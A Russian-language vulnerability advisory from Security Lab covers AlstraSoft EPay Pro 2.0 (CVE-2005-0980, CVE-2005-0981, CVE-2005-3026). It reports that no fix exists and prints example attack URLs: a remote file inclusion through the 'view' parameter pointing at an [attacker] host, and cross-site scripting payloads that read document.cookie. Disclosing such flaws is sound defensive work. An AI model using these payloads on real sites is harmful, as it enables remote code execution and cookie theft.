Security Lab

PHP-инклюдинг и межсайтовый скриптинг в AlstraSoft EPay Pro

Дата публикации:06.04.2005
Дата изменения:17.10.2006
Всего просмотров:1299
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-0980
CVE-2005-0981
CVE-2005-3026
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: AlstraSoft EPay Pro 2.x
Уязвимые версии: AlstraSoft EPay Pro 2.0

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные команды на целевой системе.

1. PHP-инклюдинг возможет из-за недостаточной фильтрации данных в параметре view сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе с привилегиями web сервера. Пример:

http://[target]/epal/index.php?view=http://[attacker]?

2. Межсайтовый скриптинг возможен из-за недостаточной фильтрации данных в параметрах 'order_num' и 'send'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/epal/?order_num=crap&payment=">
<script>alert(document.cookie)</script>&send=first&
send=regular&send=priority&s end=express

http://[target]/epal/?order_num=crap&payment=crap&
send=first&send=regular&send=priority&send='%3E%3C
script%3Ealert(document.cookie)%3C/script%3E

URL производителя: www.alstrasoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: AlstraSoft EPay Pro v2.0 has file include and multiple xss vulnerabilities